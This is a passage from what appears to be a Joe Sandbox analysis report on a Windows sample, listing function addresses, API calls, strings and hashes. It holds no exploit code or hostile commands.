                            • GetParent.USER32(?), ref: 004618C3
                            • ScreenToClient.USER32(00000000), ref: 004618CA
                            • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                            • String ID: %s%u
                            • API String ID: 1899580136-679674701
                            • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                            • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                            • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                            • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                            Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                            Download Yara Rule
                            APIs
                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: InfoItemMenu$Sleep
                            • String ID: 0
                            • API String ID: 1196289194-4108050209
                            • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                            • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                            • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                            • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                            Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32(00000000), ref: 0043143E
                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                            • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                            • SelectObject.GDI32(00000000,?), ref: 00431466
                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                            • String ID: (
                            • API String ID: 3300687185-3887548279
                            • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                            • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                            • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                            • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                            Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                            • GetDriveTypeW.KERNEL32 ref: 0045DB32
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                            • API String ID: 1976180769-4113822522
                            • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                            • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                            • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                            • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                            Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                            • String ID:
                            • API String ID: 461458858-0
                            • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                            • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                            • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                            • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                            Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                            • GlobalLock.KERNEL32(00000000), ref: 004300F6
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                            • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                            • CloseHandle.KERNEL32(00000000), ref: 00430113
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                            • GlobalFree.KERNEL32(00000000), ref: 00430150
                            • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                            • DeleteObject.GDI32(?), ref: 004301D0
                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                            • String ID:
                            • API String ID: 3969911579-0
                            • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                            • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                            • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                            • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                            Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                            • String ID: 0
                            • API String ID: 956284711-4108050209
                            • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                            • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                            • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                            • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                            Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            • API String ID: 1965227024-3771769585
                            • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                            • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                            • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                            • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                            Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: SendString$_memmove_wcslen
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            • API String ID: 369157077-1007645807
                            • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                            • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                            • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                            • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                            Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32 ref: 00445BF8
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                            • __wcsicoll.LIBCMT ref: 00445C33
                            • __wcsicoll.LIBCMT ref: 00445C4F
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll$ClassMessageNameParentSend
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 3125838495-3381328864
                            • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                            • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                            • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                            • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                            Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                            • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                            • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                            • SendMessageW.USER32(?,00000402,?), ref: 00449399
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$CharNext
                            • String ID:
                            • API String ID: 1350042424-0
                            • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                            • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                            • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                            • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                            Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                            • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                            • _wcscpy.LIBCMT ref: 004787E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                            • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                            • API String ID: 3052893215-2127371420
                            • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                            • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                            • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                            • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                            Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                            Download Yara Rule
                            APIs
                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                            • __swprintf.LIBCMT ref: 0045E7F7
                            • _wprintf.LIBCMT ref: 0045E8B3
                            • _wprintf.LIBCMT ref: 0045E8D7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                            • API String ID: 2295938435-2354261254
                            • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                            • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                            • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                            • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                            Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __swprintf_wcscpy$__i64tow__itow
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 3038501623-2263619337
                            • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                            • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                            • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                            • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                            Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                            Download Yara Rule
                            APIs
                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                            • __swprintf.LIBCMT ref: 0045E5F6
